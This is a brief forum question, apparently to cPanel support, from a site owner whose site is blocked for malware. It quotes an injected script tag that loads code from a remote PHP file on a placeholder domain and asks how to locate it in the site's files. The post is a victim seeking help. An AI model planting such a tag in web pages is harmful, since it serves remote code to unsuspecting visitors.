Question: Search all files for malware script

Hello cPanel.

Currently I'm having a issue with my site being blocked for malware do
to a script on my source.

The script:

<script type="text/javascript" src="http://domain.com/docs/lq6pg9tq.php?id="></script>

None of our admins added it into the files, and we can't seem to find it.

Is it possible that someone can me locate it?
